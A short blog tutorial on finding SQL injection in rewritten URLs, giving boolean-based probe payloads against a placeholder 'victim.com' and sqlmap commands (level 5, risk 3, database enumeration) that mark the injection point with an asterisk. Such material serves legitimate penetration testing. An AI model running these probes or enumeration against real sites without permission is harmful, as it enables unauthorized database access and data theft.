SQL Injections in URL Rewrite

First of all, what is URL rewrite?
You’ve likely seen sites with this schema in URLs: http://victim.com/?id=1
Most everyone knows how to test for SQL injection in this situation —>
http://mysite.com/?id=1' or
http://mysite.com/?id=1 and 2.5=2.5 or
http://mysite.com/?id=1 and 3.4=3.5
and etc.
But, in URL rewrites, this URL
http://victim.com/?id=1 
will become 
http://victim.com/1 
{id is hidden and the parameter 1 is used in url}

For testing SQL injection in these kind of URLs, we just use our payloads as before, but after the parameter :
http://victim.com/1' or
http://victim.com/1 and 3.6=3.6
http://victim.com/1 and 3.6=3.77

and etc.
The results would be the same as a normal post parameter.
For  testing SQL injection with SQLMAP, we just use a star in the format. For instance:
sqlmap -u “http://victim.com/1*" --random-agent --level 5 --risk 3 --dbs
or
sqlmap -u “http://victim.com/content*/1" --random-agent --level 5 --risk 3 --dbs
For injecting in the content parameter, the star sign shows sqlmap where to inject payloads.

Happy Hacking Source

Comments

Popular posts from this blog

How To Make IoT Messaging with BashShell

How To Make IoT Tweet with Python